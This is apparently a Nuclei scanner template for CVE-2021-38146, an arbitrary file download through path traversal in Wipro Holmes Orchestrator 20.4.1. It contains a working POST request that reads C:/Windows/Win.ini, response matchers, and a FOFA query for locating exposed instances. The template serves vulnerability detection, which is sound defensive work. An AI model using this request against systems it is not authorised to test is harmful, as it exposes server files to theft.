56 lines
1.7 KiB
YAML
56 lines
1.7 KiB
YAML
id: CVE-2021-38146
|
|
|
|
info:
|
|
name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
|
|
remediation: Fixed In v21.4.0
|
|
reference:
|
|
- https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html
|
|
- https://flippingbitz.com/post/wipro-ho-2041-cve/
|
|
- https://www.wipro.com/holmes/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-38146
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-38146
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01735
|
|
epss-percentile: 0.87875
|
|
cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wipro
|
|
product: holmes
|
|
fofa-query: title="Wipro Holmes Orchestrator"
|
|
tags: cve,cve2021,wipro,holmes,lfi
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/home/download"
|
|
|
|
headers:
|
|
Content-Type: application/json
|
|
|
|
body: |
|
|
{
|
|
"SearchString": "C:/Windows/Win.ini",
|
|
"Msg": ""
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "[fonts]"
|
|
- "[extensions]"
|
|
- "[files]"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022022d15569ab9142630935d44402f8f46cca7954122a02f564f040e69e9b280728022020380f3ba30a627ae60d45fc005975c1039e49de20d38fb43147b7ef6533bbd5:922c64590222798bb761d5b6d8e72950 |